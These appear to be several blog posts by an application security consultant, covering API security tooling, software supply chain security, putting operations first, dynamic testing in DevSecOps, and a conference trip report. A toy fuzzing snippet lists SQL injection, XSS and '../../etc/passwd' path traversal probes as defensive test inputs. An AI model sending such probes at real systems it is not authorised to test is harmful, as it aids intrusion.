Quite often clients ask me “Which API Security Tool should I buy?”, and as you might have guessed I answer “It depends”, then proceed to ask them a dozen questions. Recently I asked a colleague at Semgrep if they felt this process might be of value to my readers, and Chinmay said “Absolutely!” and here we are with a new blog post.
If you are in charge of securing the software at your organization, it is likely you have quite a few APIs under your purview, and you might feel overwhelmed by the huge list of products on the market right now. Since 2021, this market has exploded with several new API security tools. In this article I am going to stress that what matters most when selecting a tool is what you need from it. There are several different functionalities that might interest you, depending upon your AppSec program, how invested the developers are, your SDLC methodology (waterfall, agile, DevOps, something else), your development environment (and the level of freedom your developers have), and your percentage of new types of applications (API/microservice) versus older types (enterprise, monolith).
Note: I’m going to speak about tools that work with the OpenAPI/Swagger specification in this article. For those using SOAP, your toolset will be significantly more limited, and some of these tools will not work for you. I gently suggest that for all new APIs you develop going forward you use OpenAPI, as you will have significantly more options.
Common API Security Tooling Features:
Inventory – Finding all of your live APIs is VERY VALUABLE. There’s huge potential for there to be one or more APIs that you might have missed, living on your network, unprotected. Sometimes this feature is called enumeration.
Fuzzing or dynamic automated testing, made for APIs (not web apps) – Interacting with your API, sending it requests, and looking for problematic responses.
Web Application Firewall (WAF) for APIs – Blocks malicious requests and responses.
API Gateway (a must-have if you are putting your API on the internet!) – Performs authentication and authorization, throttling, resource quotas, and more. If you want to fight bots, this is your #1 defense.
“Context” – This is a new one that several vendors list as a feature; it means telling you more information about the API to help you prioritize what to fix, and what can be safely ignored. I’m not exactly sure how each of these works, but it’s a promise some of them make. You need to investigate exactly what this means before buying.
Static analysis (SAST) – You can use a normal automated SAST tool to find vulnerabilities in your written code; it covers everything except the OpenAPI/Swagger file itself. No need to get a special tool.
API Linters – These help with code quality, but they can also be security-focused. Finding one that can open your OpenAPI file and help you validate your definition file (sometimes called a schema) can save you lots of bug-fixing time down the road.
Regular (non-API-specific) automated dynamic testing tools (DAST) are not very good at scanning APIs, even if the vendors tell you they are good. Unless it is a web proxy, and it’s in the hands of a Penetration Tester, assume they are not worth your time. Get an API-specific dynamic testing tool instead, which can understand your API, rather than older tools that were made for web apps.
Software composition analysis (SCA): APIs have dependencies too, but it’s the same as web apps, so use the same one you use for all your apps. No need to get a special tool.
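To make the fuzzing feature above a bit more concrete, here is a toy sketch of what these tools do under the hood. Everything in it (the payload list, the response-checking logic) is simplified and invented for illustration; real fuzzers are far more sophisticated:

```python
# Toy sketch of API fuzzing: generate hostile inputs for a field,
# then flag responses that suggest the API mishandled them.
# The payloads and response markers below are illustrative only.

FUZZ_PAYLOADS = [
    "",                          # empty input
    "A" * 10_000,                # oversized input
    "' OR '1'='1",               # SQL injection probe
    "<script>alert(1)</script>", # XSS probe
    "../../etc/passwd",          # path traversal probe
    "\x00",                      # null byte
]

def looks_problematic(status_code: int, body: str) -> bool:
    """Flag responses that hint at an unhandled error or an information leak."""
    error_markers = ("stack trace", "traceback", "sql syntax", "exception")
    if status_code >= 500:
        return True
    return any(marker in body.lower() for marker in error_markers)

# Example: classifying a (fake) response a fuzzer might get back
print(looks_problematic(500, "Internal Server Error"))  # True: any 5xx is suspicious
```

A real tool would send each payload to every parameter of every endpoint and record which ones triggered a problematic response.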
I suggest an API gateway for every company, full stop. Ideally you are already doing SAST and SCA for your regular web apps with tools you already own/use, keep doing that for your APIs. For Dynamic scanners, you need an API specific one unless you want to spend many engineering hours making it work properly (time you could spend fixing bugs instead). There are also quite a few IDE plugins, but the key here is: which things are you concerned about? Go from there and you will find the right product. Most of these companies have 2-4 different functionalities. Figure out which one(s) you want, then do a proof of concept exercise (POC) with the finalists. After that, pick the winner!
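As an aside, if you are curious what the “throttling” an API gateway performs actually looks like, here is a toy token-bucket rate limiter. Real gateways implement this (and much more) for you out of the box; this sketch is purely illustrative:

```python
# Toy token-bucket rate limiter, the kind of throttling an API gateway
# performs. It uses a manually supplied clock so the behaviour is
# deterministic; a real implementation would use the system time.

class TokenBucket:
    def __init__(self, capacity: int, refill_per_second: float):
        self.capacity = capacity
        self.tokens = float(capacity)
        self.refill_per_second = refill_per_second
        self.last_refill = 0.0

    def allow(self, now: float) -> bool:
        """Refill based on elapsed time, then spend one token if available."""
        elapsed = now - self.last_refill
        self.last_refill = now
        self.tokens = min(self.capacity, self.tokens + elapsed * self.refill_per_second)
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False  # throttled: a gateway would typically return HTTP 429

bucket = TokenBucket(capacity=2, refill_per_second=1.0)
print(bucket.allow(0.0), bucket.allow(0.0), bucket.allow(0.0))
# two requests fit in the bucket, the third is throttled
```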
Right now, the concept of the software supply chain and securing it is quite trendy. After the SolarWinds breach, the attacks on crypto wallets, and the Log4j fiasco, the entire world appears to be focused on securing the software supply chain. I’m not complaining. If anything, as an application security nerd, I am quite pleased that I am finally getting buy-in that these things need to be protected, and that vulnerable dependencies need to be avoided. Folks, this is GREAT.
Software composition analysis, often called SCA, means figuring out which dependencies your software has, and of those, which contain vulnerabilities. When we create software, we include third-party components, often called libraries, plugins, packages, etc. All third-party components are made up of code that you, and your team, did not write. That said, because you have included them inside of your software, you have added (at least some of) their risk into your product.

A ‘supply chain’ means all of the things that you need to create an end product. If you were creating soup, you would need all of the ingredients of the soup, you would need things like pots and pans in order to cook and prepare the ingredients, you would need a can or a jar to put it in, and likely a label on top to tell everyone what type of soup it is. All of those things would be considered your supply chain.
Imagine inside of your soup one of the ingredients is flour. Chances are that it (wheat) was grown in a field, and then it was harvested, and then it was ground down into flour, and then it might have been processed even further, and only then it was sent to you, so that you could create your soup. All of the steps along the way could have been contaminated, or perhaps the wheat could have rotted, or been otherwise spoiled. You have to protect the wheat all along the way before it gets to you, and once you make the soup, in order to ensure the end product is safe to eat.
Protecting all of the parts along the supply chain, from ensuring that there aren’t terrible chemicals sprayed on the ingredients as they grow, to ensuring that the can or jar that you put the soup into has been properly sterilized, is you securing your supply chain.
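The software equivalent of checking your ingredients, the SCA part, can be sketched in a few lines. The package names and the advisory below are completely made up for illustration; real tools pull advisories from feeds such as the NVD or OSV:

```python
# Toy SCA check: flag dependencies that appear in a known-vulnerability
# database. The dependency names, versions, and advisory text here are
# invented purely for illustration.

# What your app depends on (name -> version)
dependencies = {
    "example-json-lib": "1.2.0",
    "example-http-lib": "4.0.1",
}

# Known-bad versions (hypothetical advisories)
advisories = {
    ("example-json-lib", "1.2.0"): "hypothetical advisory: unsafe deserialization",
}

def find_vulnerable(deps: dict, db: dict) -> list:
    """Return (name, version, advisory) for every dependency with a known issue."""
    return [
        (name, version, db[(name, version)])
        for name, version in deps.items()
        if (name, version) in db
    ]

for name, version, advisory in find_vulnerable(dependencies, advisories):
    print(f"{name} {version}: {advisory}")
```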
When we build software, we need to secure our software supply chain. That means not only ensuring the third-party components that we’re putting into our software are safe to use, but that the way we are using them is secure [more on this later]. We also have to ensure how we build the software is safe, and this can mean using version control to store our code, ensuring any CI/CD that we use is protected from people meddling and changing it, and ensuring every other tool we use and process we follow is also safe.
If you’ve followed my work a long time, I am sure you know that I think this includes a secure system development life cycle (S-SDLC). This means each step of the SDLC (requirements, design, coding, testing and release/deploy/maintain) contains at least one security activity (providing security requirements, threat modelling, design review, secure coding training, static or dynamic analysis, penetration testing, manual code review, logging & monitoring, etc.) A secure SDLC is the only way to be sure that you are releasing secure software, every time.
With this in mind, the difference between the two is that SCA only covers third party dependencies, while supply chain security also covers the CI/CD, your IDE (and all your nifty plugins), version control, and everything else you need in order to make your software. It is my hope that our industry learns to secure every single part of the software supply chain, as opposed to only worrying about the dependencies. I want securing these systems to be a habit; I want it to be the norm. I want the default IAM (identity and access management) settings for every CI/CD to be locked down. I want checking your changes into source control to be as natural as breathing. I want all new code check-ins to be scanned for vulnerabilities, including their components. I want us to make software that is SAFE.
If you read my blog, you are likely aware that I recently started working at Semgrep **, a company that creates a static analysis tool, and recently released a software supply chain security tool. If you’ve seen their SAST tool, you know they’re pretty different from all the other similar tools on the market, and their new supply chain tool is also pretty unique: it tells you if your app is calling the vulnerable part of your dependencies. They call it ‘reachability’. If your app is calling a vulnerable library, but it’s not calling the function inside of that library where the vulnerability lives, you’re usually safe (meaning it’s not exploitable). If you ARE calling the function inside your library where the vulnerability is located, there’s a strong likelihood that the vulnerability could be exploitable from within your application (meaning you are probably not safe). We added this to the product to help teams prioritize which bugs to fix, because although we all want to fix every bug, we know there isn’t always time. In summary, if the vulnerability is reachable in your code, you should run, not walk, back to your desk to fix that bug.

– Me, again
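Semgrep’s actual analysis parses your source code to build this picture; the toy sketch below (with made-up library and function names) only illustrates the reachability idea itself:

```python
# Toy illustration of 'reachability': a vulnerable dependency only
# (probably) matters if your code actually calls the vulnerable
# function. All names here are invented; a real tool derives this
# information by analyzing your source code.

# The one function in the library where the vulnerability lives
VULNERABLE_FUNCTION = "examplelib.parse_untrusted"

# Functions your application actually calls (a crude "call graph")
app_calls = {
    "examplelib.format_output",
    "examplelib.parse_untrusted",
}

def vulnerability_is_reachable(calls: set, vuln_fn: str) -> bool:
    """True if the app calls the function where the vulnerability lives."""
    return vuln_fn in calls

if vulnerability_is_reachable(app_calls, VULNERABLE_FUNCTION):
    print("Reachable: run, don't walk, and fix this bug!")
else:
    print("Present but not called: likely lower priority.")
```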
I have worked with more than one company who had programmers who did not check in their code regularly (or at all) to source control. Let me tell you, every single time it was expensive! Losing years of hard work will break your heart, not just your budget. Supply chain security matters.
Join me in this adventure by starting at your own office! Whether you have budget or not, there are paid and free tools that can help you check to see if your supply chain is safe! You can also check some of this stuff manually, easily (the IAM settings on your CI/CD are just a few clicks away). Reviewing the setup for your systems, and ensuring you have everything important backed up, will make your future less stressful, trust me.
You can literally join me on this adventure, by signing up for the Semgrep newsletter! The Semgrep Community is about to launch live free events, including training on topics like this, and we can learn together. First email goes out next week, don’t miss out!
~ fin ~
** I work at Semgrep. This means I am positively biased towards our products and my teammates (I think they are awesome!). That said, with 27+ years’ experience in IT, being a best-selling author and world-renowned public speaker, there are a LOT of companies that would be happy to let me work for them. I chose Semgrep for a reason; my choice to work there was intentional. That said, I will try not to be annoying by only talking about work on my blog, promise!
Many years ago, when I was a software developer, a very smart boss said to me: “Tanya, it’s always operations first. Projects after.” At first, I was confused, how will I make any progress on my projects if I’m always doing operations? And, what the HECK is “operations” anyway? Reader, this was an incredibly important lesson that has helped me countless times, throughout my entire career.
At We Hack Purple (WHP), we have a rule: “operations first, then everything else”. Operations means all the stuff you already regularly do, that people are counting on you for. For instance, at WHP, every single week there’s a newsletter. If it’s late, our subscribers ask where it is. Subscribers expect it and enjoy receiving it. It is one of the services that we offer, and it’s part of our general operations.
Other examples of WHP operations: running payroll, answering support requests from students in our academy, answering emails from active clients, accepting/approving new community members, and moderating our online community if someone acts inappropriately. Imagine if my team and I were “too busy” to run payroll, to ensure students could log into their accounts, or to let new people into our community? It would become a huge bottleneck for the business, and WHP would be known for leaving people disappointed.
When I was a software developer, ensuring that all bugs were fixed, customer problems/complaints were addressed, all our apps were up and running, and that my entire team knew what they needed to do (and had the information/access/resources to do it), meant that I could then work on my projects. Ensuring people weren’t waiting on me not only meant I ran a smoothly running shop; it also got me promoted. Multiple times!
Examples of Application Security ‘Operations’:
Attending project kick off meetings to make yourself known to the team
Providing security requirements for all new projects
Performing threat modelling sessions, and completing the paperwork afterwards
Following up on unfixed bugs
Checking in with your security champions, every month
Answering questions from… Everyone.
Running scans, reviewing scan results
Arranging pentests, reviewing results with dev team
Reporting up to management
Being ready, should a security incident occur
Recently I had a conversation with a client who was trying a new project management methodology, and we were talking about how to best implement it at their org. After about 10 minutes of discussion, I said “What about operations? Sounds like you’re not getting your everyday work done. If you can’t even finish up the close out of a security incident from 6 months ago, you don’t need a new project management system. You need to stop over-allocating the people on your team. Ideally, operations should take somewhere between 25-50% of your time, but it sounds like you have a lot of not-quite-finished work items. Get all that done, then start on new projects. And ensure you save time, every day, for operations.”
Note: it was 25-50% of the time *for her team* and the responsibilities they had, to run operations. For your team it might be higher or lower. When I was a software developer, I was told to never allocate a resource above 80%, because something always comes up. And they were right!
Be prepared, always add 20% to your time estimates for software projects. You’ll thank me.
If your team is supposed to review the architecture for every single software project, and you have allocated zero time for it, how do you think that’s going to go? It’s not going to be good, that’s for sure. It sounds obvious when I lay it out like that, and you might think “I would never do that”, but guess what? I see companies do this ALL THE TIME. And I know I have been guilty of this in the past, not realizing I had done it.
Any security activities that you want to do as part of the system development life cycle (SDLC) are part of your team’s operations. If there are documents to review, meetings to attend, scans to run, whatever, you need to ensure you have the capacity to perform these activities as needed. You can’t say “You must complete this 20-page architecture document, then receive our approval, before you start your coding phase” then proceed to make them wait several weeks for feedback from your team. Or… I guess technically you CAN do this, but it will cause a lot of problems, frustration, and delays for other teams. *Note: I would not recommend this strategy to friends.*
Then my client and I got into a discussion about the 3 ways of DevOps (as per The Phoenix Project and The DevOps Handbook), with the 1st way being “Emphasize the efficiency of the entire system”, the 2nd being “Fast Feedback”, and the 3rd way “Taking Time to Improve Your Everyday Work.” I LOVE DevOps, and in my opinion, The Three Ways are rules to live by if you work in IT.
I know I’ve talked about The Three Ways of DevOps a lot, but they add value in SO MANY situations! I just can’t help myself, they are just SO GOOD.
The First Way of DevOps: Emphasize the efficiency of the entire system.
If security teams around the world took this to heart, people would like their IT Security co-workers a lot more. I have heard hundreds of times “We make them fill out all these forms, then we don’t have time to read them.” So…. Did you stop making them fill out the forms? “No.“
If instead the security team adopted the model of “operations first”, they would 1) make those forms way less complicated and time-consuming, and 2) allocate enough time for their team to properly review them, promptly. It is my wish that security teams would look at all the inputs (forms, meetings, documents, and so on) that they ask for from other teams, and then ensure they have capacity to use those inputs to their fullest, in efforts to protect their organizations. This might mean reducing risk, adding additional layers of security, preparing for potential disasters, etc. Security teams demanding that other teams perform work, and then not fully utilizing the work they asked for, makes me very upset. I used to be a software developer, and I have been put through the paces by a lot of management in my time, and I’m quite tired of filling out templates that no one ever reads… And I know I am not the only person who feels this way!
The Second Way of DevOps: Fast Feedback
I tend to add onto this phrase and change it from ‘fast feedback’ to ‘feedback that is accurate, and gets to the right person/people, fast’. Who cares if the feedback is fast if it never gets to its intended destination? Or if it’s completely inaccurate, so it sends someone on a wild goose chase? That is not helpful.
This is another area where if we do ‘operations first’ that we will see some big benefits. Whenever a project team asks for feedback from the security team, if we turned that around very quickly it would enable the project to finish that part ON TIME. Meaning the rest of the project could potentially also finish ON TIME. Being on time, on budget, and pleasing the customer with the end product, is the trifecta of “this project succeeded”. That’s what we all want, successful projects.
While many teams ask the security team for feedback constantly, there are others who hide stuff from the security team. When other teams hide things from us, it’s often because we take so damn long to provide feedback and/or the feedback we provide is not helpful. I suspect that security teams that gave fast feedback, regularly, would receive more requests. “Hey, we’re planning on doing XYZ, any chance we could run our design by you?” is a sentence I dream about hearing. When the other IT teams come to us, instead of us chasing them around, we have created a trusting relationship!
The Third Way of DevOps: Taking time to improve your daily work.
When I think of The Third Way, I try to apply it not only to MY daily work but also to ‘other people’s daily work that I affect’. If I can take an afternoon to tighten up the configuration on a tool, to remove some false positives it was spitting out, this could potentially affect the daily work for several of my co-workers (usually developers). If I spend 4 hours doing this, but it saves about one hour of time for each of my 100 developers that year, that’s a fantastic return on investment (ROI).
Another way I have applied this principle in the past is by creating 1-page ‘best practice’ documents for various technologies. If one project team is building a serverless app, and I need to give them some guidelines, why not reuse those guidelines next time, and for every new project using that same technology within our org? We could provide them even if they didn’t ask; we have the option to provide best-practices information by default. And in my case, as an independent consultant, author, community manager, and public speaker, why not share that research in a blog, conference talk, or book? Why not share this work with as many other humans as possible, so that, as an industry, we can ALL move forward? (You don’t have to think that big, but, as usual, I digress.)
When we are putting operations first, before we work on projects, you might think that The Third Way is not in line with this thinking, but it is! It’s about finding better efficiencies for when we are performing operations. Improving what we do, day in and day out, so we do a better job and/or we can do it faster, from then on. It’s an investment in improving our organization’s operations as a whole, going forward. We are improving our futures.
Tip: Double your time estimates. A boss told me this long ago, and at the time I thought he was nuts. The idea with doubling your estimate is that 1) technical folks are famous for underestimating how long something takes to do and 2) if you finish early you look like a rock star! This only works if you are the only person to double it though; I once had a boss who doubled my estimate, and his boss also doubled it, and by the time it got to the big boss it looked like it was going to take 6 months for me to make two Windows forms… That was not so good…
Back To Operations
Back to the topic at hand: putting operations first. If you are not able to get through your inbox, you probably shouldn’t take on another new project. If you have several other teams waiting on you, for a process that your team is forcing them to go through, you should likely not purchase yet another tool. If you don’t already have your current toolset fully operationalized (for example, having a SAST and SCA scan performed on every PR, as opposed to manually performing 1-off scans from time to time), then you are not ready to add yet another security step to the SDLC. If you aren’t meeting your current operational requirements, you cannot (successfully) take on new projects.
Last tip! Help your teammates, especially those with less experience and seniority, prioritize and reprioritize their work, often. I’ve seen many people become a bit lost, or feel overwhelmed, because their list has gotten out of hand. Often there are things on the list that you, as their boss, are completely unaware of. Take that stuff off, and go talk to the other managers who are trying to offload their responsibilities onto your team…
– Me, again
If every single day you never finish your work, if your inbox has people writing you multiple times asking the same question because you still haven’t answered, if you feel like you are drowning at work; it’s time to look at your operational capacity, and make sure you haven’t over allocated yourself or your team. It’s always better to do a fantastic job of your current responsibilities, than to have several unfinished projects and really frustrated stakeholders.
I want to get something straight: you do not need to put a dynamic scanning tool into your CI/CD pipeline in order to do DevSecOps properly. You don’t even necessarily need to use automated dynamic analysis at all, to be doing DevSecOps.
I do regular consulting via IANS Research and quite often I find myself assuring clients that “Yes, what you are doing makes perfect sense. You are covering all of your bases. In fact, you’re doing a GREAT JOB.”
So why the mystery? Why the uncertainty? Let’s dive a little deeper.
What IS Dynamic Analysis?
Dynamic (when referring to a system, not a person) means constant change, activity, or progress. When we perform dynamic types of testing on a technology system, that means interacting with it as it is running. This could mean using live software that is hosted on a web server, or a smart fridge that is turned on, with real food inside of it.
Dynamic testing can be performed from within an application, which is what IAST (Interactive Application Security Testing) products promise: testing your running app from the inside out. More commonly dynamic analysis is performed from outside the application, often with a web proxy, an automated DAST (Dynamic Application Security Testing) tool, or manually with a web browser or direct calls to the system (such as API calls).
Some of the advantages of dynamic analysis include: you get to see how the system actually works, you can discover if some of the behaviours are not what you were planning from a business perspective, you can try to find business logic issues (which are often caused by design flaws), and you can validate whether a vulnerability found by an automated tool is exploitable (or not).
A DAST (Dynamic Application Security Testing) tool is generally considered a software product that scans web applications and APIs for vulnerabilities, (generally) performing both active and passive scans. It works in a completely automated way, such that you do not need weeks, months, or years of training to be proficient with it. Sometimes DAST tools are also called a VA (vulnerability assessment) scanner or a ‘web app scanner’.
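For a flavour of what a simple passive DAST-style check looks like, here is a minimal sketch that inspects a response for commonly missing security headers. The response is hard-coded for illustration; a real scanner would of course make live requests:

```python
# Minimal sketch of a passive DAST-style check: inspect an HTTP
# response for missing security headers. The expected-header list is
# a small illustrative subset, and the response is hard-coded.

EXPECTED_HEADERS = [
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Content-Type-Options",
]

def missing_security_headers(headers: dict) -> list:
    """Return the expected security headers absent from a response."""
    present = {name.lower() for name in headers}
    return [h for h in EXPECTED_HEADERS if h.lower() not in present]

# A (fake) response from the app under test
response_headers = {
    "Content-Type": "application/json",
    "Strict-Transport-Security": "max-age=31536000",
}

print(missing_security_headers(response_headers))
# flags the CSP and X-Content-Type-Options headers as missing
```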
The most obvious disadvantage of dynamic testing is that you can’t see the code. This is often called black box testing, where you don’t get to know the design, the functionality, or anything else about the application before you perform your test. Being able to see how the code works, or a network or architecture diagram, can help someone with a malicious mindset find more vulnerabilities faster.
A web proxy is a software product that can be used for manual, dynamic security testing. Penetration testers often use web proxies while testing APIs and web applications. Sometimes products combine both the DAST and web proxy functionality into one product, and, unfortunately, those are often called a DAST or a web proxy, as though the terms were interchangeable, which leads to more than a little confusion.
Another disadvantage of dynamic testing is that there are a whole bunch of different types, and sometimes it gets confusing. When using an automated DAST scanner, pretty much anyone can operate it (this is an advantage). This means that the barrier to entry is very low, and you don’t have to hire an expert, which can be expensive; it can also be quite difficult to attract that type of talent on a permanent basis. That said, automated dynamic scanners, when operated by someone without very much training, can result in bad data being injected into your database, an untested portion of your attack surface, an inability to talk directly to APIs, and more. Although it’s wonderful to have this automated functionality scanning legacy apps, and finding lots of old bugs in your ancient code, for more modern apps… Some automated DAST tools leave a lot of untested attack surface behind.
It should be noted that each DAST and each web proxy product works differently. Some have great scheduling automation options, some don’t. Some are only able to automate passive scanning, while others can do both active and passive scanning. Not all options discussed in this article are available for all products.
– Me, based on comments from my friend Rick
This brings me to penetration testing. Penetration testing usually involves a whole bunch of tools, an entire toolbox, if you will. It also generally involves at least one extremely skilled security testing expert. They manually test the application by using a series of tools (some automated, some not), to find as many bugs as possible, then validate each one’s exploitability. They only report what they feel to be legitimate business risks, vulnerabilities, or other issues that they feel could hurt your system, your business, your employees, users, or customers. Just the important stuff!
But there are more types of dynamic testing than just automated DAST and PenTesting, and all of them count under the giant umbrella of the term dynamic. Performance testing, stress testing, DDoS testing. All of those are dynamic, they interact with your application to find out if there are problems you should be aware of.
In addition to the traditional DAST scanners, there are newer fuzzing and dynamic scanners that are created only for APIs (application programming interfaces), and they are looking more and more promising every month. In 2020 and 2021, several new API companies came on the market, with amazing new products. A lot of them offer dynamic forms of analysis that are different than anything I had seen before.
One of the examples I saw recently, in San Francisco as part of the RSA festivities, was an IDE plugin that would allow the developer to fuzz each one of the fields within their API, in an automated fashion. Fuzzing means adding in all sorts of bad input, to test the input validation of a system. The person demoing it for me, Isabelle Mauny, showed me how it could look at the API definition file, then automatically generate tests for you. Holy smokes, nothing like that existed when I was a dev!
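I don’t know exactly how that plugin works internally, but the general idea of generating tests from a definition file can be sketched like this, using a tiny invented fragment of an OpenAPI-style definition:

```python
# Sketch of generating fuzz cases from an API definition file.
# The definition fragment is a tiny, invented OpenAPI-style dict;
# real tools parse the full YAML/JSON specification.

definition = {
    "path": "/users/{id}",
    "parameters": [
        {"name": "id", "type": "integer"},
        {"name": "email", "type": "string"},
    ],
}

# Type-aware hostile inputs to try against each parameter
PAYLOADS_BY_TYPE = {
    "integer": [-1, 0, 2**63, "not-a-number"],
    "string": ["", "A" * 10_000, "<script>alert(1)</script>"],
}

def generate_fuzz_cases(defn: dict) -> list:
    """One test case per (parameter, hostile payload) pair."""
    return [
        (defn["path"], p["name"], payload)
        for p in defn["parameters"]
        for payload in PAYLOADS_BY_TYPE.get(p["type"], [])
    ]

cases = generate_fuzz_cases(definition)
print(len(cases))  # 4 integer payloads + 3 string payloads = 7 cases
```

This is exactly why a well-maintained definition file pays off: the better your schema, the better the tests a tool can generate from it.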
I’ve also seen some really amazing functionality involving monitoring for data that is being exfiltrated (watching for potential data breaches). A regular web application firewall can be configured to watch for unusually large HTTP responses (think: a whole heck of a lot of data, way more data than makes sense). And that can be quite helpful. However, some of the web application firewalls made for APIs, and other monitoring products made for APIs, can watch for when you have made a grave error in your access control. They can check to see if perhaps the request that you created has brought back more records than it should have, or different fields that were not expected to be brought back. With the biggest threats to APIs (according to the OWASP API Security Top Ten) being broken authorization at all levels, that’s some pretty spectacular coverage. Although this is more of a shield than a dynamic test, so to speak, we have to choose what reduces business risk the most, and this might protect you from a myriad of issues that an automated tool would likely miss.
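I can’t speak to exactly how each vendor implements this, but the core of such a check might look something like the sketch below, with entirely invented data shapes:

```python
# Sketch of the kind of check an API-aware monitoring tool might do:
# compare what a response actually returned against what the endpoint
# is supposed to return. The endpoint rules and records are invented.

EXPECTED_FIELDS = {"id", "name"}   # fields this endpoint should return
MAX_EXPECTED_RECORDS = 1           # a lookup by ID should return one record

def response_looks_like_a_leak(records: list) -> list:
    """Return human-readable warnings; an empty list means all looks fine."""
    warnings = []
    if len(records) > MAX_EXPECTED_RECORDS:
        warnings.append(
            f"expected at most {MAX_EXPECTED_RECORDS} record(s), got {len(records)}"
        )
    for record in records:
        extra = set(record) - EXPECTED_FIELDS
        if extra:
            warnings.append(f"unexpected fields returned: {sorted(extra)}")
    return warnings

# A (fake) response that brought back far too much data
leaky_response = [
    {"id": 1, "name": "Alice", "password_hash": "x"},
    {"id": 2, "name": "Bob", "password_hash": "y"},
]
for warning in response_looks_like_a_leak(leaky_response):
    print(warning)
```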
Other nifty dynamic functionality that is made only for APIs include inventory tools. Often, they perform active (sending their own test requests) or passive (checking requests and responses for security problems, but never sending their own requests) dynamic scans at the same time they perform inventory, telling you immediately if they spot something new that might be a problem in your API. They can find all your APIs, including some that you thought were decommissioned months or years ago! I personally find this to be an extraordinary step forward in making sure that you have complete tooling coverage of your application portfolio. When I started in AppSec, I would never have imagined that I could have tools that could stop an error within just a few minutes of it being released into prod!
On top of this is WHERE you can do testing with all of these cool new dynamic tools. You can test directly in the IDE (integrated development environment), AS YOU WRITE YOUR CODE! That’s amazing, and the furthest ‘left’ security could ever push from a tooling standpoint. Some of them can be run nightly, or even continuously, in your production environment. When I started in AppSec, I had to manually run every single scan for dynamic tests. Now I can ‘set it and forget it’, only receiving reports when it finds new bugs. It’s a security nerd’s dream come true!
This leads me back to the title of this blog post: you truly do not need to run an automated DAST product in your CI/CD to say you’re doing DevSecOps. It is NOT a requirement! You can run all sorts of different types of dynamic tools, in several different places (IDE, against prod and pre-prod, continuously in prod, or CI/CD), and still do a great job and have excellent coverage. The key with DevSecOps is ensuring whatever you do follows the processes of the DevOps folks where you work and that it works within the Three Ways of DevOps (providing fast feedback, optimizing efficiency for the entire system, and aiming for constant improvement and learning).
If the way you run your tools slows down the pipeline for everyone, that’s not a win. If the tools you choose don’t get you good coverage, that’s not a win. If the tools you have report a lot of false positives, that’s never a win. Instead of trying to follow what the vendors and marketing materials tell us, focus on finding what creates the best results for YOUR org. Every dev shop is unique, and thus your security program will be too!
Potential alternatives to running an automated DAST in your CI/CD:
Automating a DAST to run monthly, overnight, receiving an email in the morning: set it and forget it!
Focusing almost exclusively on static forms of analysis (SAST, SCA, code review, secret scanning), and then pentesting the important apps once a year (pentesting is a form of dynamic testing)
Move towards a microservice architecture, where the front-end GUI is dumb (no business logic), then, when you’re ready, switch your old toolset for modern API-specific tooling, plus continue with static and other forms of testing.
Use DAST manually, but only for legacy monolithic apps (think of it as backwards compatibility), PenTest the 2-5 most important apps, then use API tools for dynamic testing of APIs, plus (continuous) monitoring and inventory for extra coverage.
Ditch all dynamic testing, and just do static forms of testing (only recommended if you have a limited budget and you only have time and money for one tool, and for some reason do not want to use free DASTs).
Install an IAST tool into all of your apps, and use it in pre-prod environments and/or prod environments. Then you could skip DAST, or just PenTest the important apps, on top of the IAST.
PenTest everything, once a year (most expensive option, and certainly not the best, but I’ve seen it)
PenTest just your 3-5 most important apps then cross your fingers for the rest of them (not recommended, but more popular than you might think!)
None of the above options include non-tooling activities and support you can provide, which I always recommend in addition to tooling!
Training (secure coding, how to use security tools, secure design, threat modelling, etc.)
Security best practice instructions for each type of technology
Architecture and design review
Security requirements for every project
Security Champion programs
I could go on forever! There are many other ways than just buying tools to support a secure system development life cycle (S-SDLC or SSDLC).
All of this aside, try not to let yourself get too caught up in what you read on the internet (this blog post included) and instead focus on what you and your team feel gets you the best coverage, fits your budget, and works WITH the developers and the processes they use. If you’re really struggling, it might be time for a change.
As you might be aware if you read my blog, I spoke at B-Sides San Francisco and RSA Conference 2023, and it was GREAT! Below is a report about my trip, and all the wonderful people, places, and activities I saw and participated in from April 21-28, 2023.
April 22: I flew into San Francisco late on Friday the 21st, to wake up on Saturday to have breakfast with my two friends Ashish Rajan and Shilpi Bhattacharjee, the hosts of the Cloud Security Podcast (which obviously you need to subscribe to if you work in that field. Right now. Don’t worry, I’ll wait.)
During breakfast we filmed a ridiculous little video for our panel event with Snyk on Tuesday of this week, you can see it below. I then went to B-Sides San Francisco and saw a LOT of amazing talks.
We also recorded an episode of their podcast together!!!!
There were several more good ones, but I couldn’t see them all!
I realize that if you’re a regular viewer of The Cloud Security podcast you might not recognize Shilpi, that’s because she’s generally behind the camera, as the producer of the show, but she is an equal partner in all the content the show creates. Plus, she’s wonderful!
Then I attended even more talks at B-Sides SF that were really good, and then finally came the time to give my talk. Being the very last talk, but not a keynote, at a 2-day-long event, is a hard time slot, but some people still came to it anyway. Here’s a link to a video of my talk, ‘Secret Hunting’ and a link to the corresponding blog post.
I also was interviewed by Buu Lam of F5 in the lobby of the AMC where B-Sides was held, video below. You all know how much I adore Buu!!!! It’s a fun interview.
This morning I had a private meeting for work. Although I can’t tell you about it, being able to shake hands with someone, in person, with whom you are going to do some serious work, is a pretty amazing feeling in this ‘post-covid’ world.
At lunch time on Monday, I went to the Microsoft Hub to be on a panel at an event called Women’s Executive Lunch. I usually say no when conferences invite me to be on this sort of panel, because if everyone else is on all the other stages talking about AppSec, and the whole conference is about AppSec, I don’t want to be the side show. I want to be on the main stage, talking about the main topic. I also don’t want to be known as “a woman in tech”, I want to be known as an expert in application security, which is what I am. Being female should be secondary (or not important at all), or at least that’s what I would prefer when it comes to my career and professional reputation. When everyone else is talking about a technical topic, I don’t want to be off topic. I also don’t want to talk about something that no one came there to learn about; most people don’t buy a ticket to a technical conference in hopes of learning about ‘women in tech’. I also think that most of the people at a conference who would come to such a talk are already on board with the whole “turns out women deserve the same rights as men” thing, and thus we are preaching to the choir. The people who need to hear it aren’t going to choose to go to that room. They are going to skip it.
But when Microsoft asked me to address a group of women and allies, at an event aimed only to help, support, and promote women in tech, I jumped at the chance. To me, this is completely different to what I described above; we were there to try to provide answers, assistance, and encouragement, at an event dedicated only to this topic and cause. And that, my friends, is very much in line with my beliefs and what is important to me.
Also: I suspected that if I attended that I might get another hug from Ann Johnson (#careeraccomplishment). AND I DID!!!!! Note: last time I got a hug from Ann was when I won “Hacker of the Year” 2019, in Vegas as part of hacker summer camp. You need to be particularly amazing in order to earn this privilege. #worthit
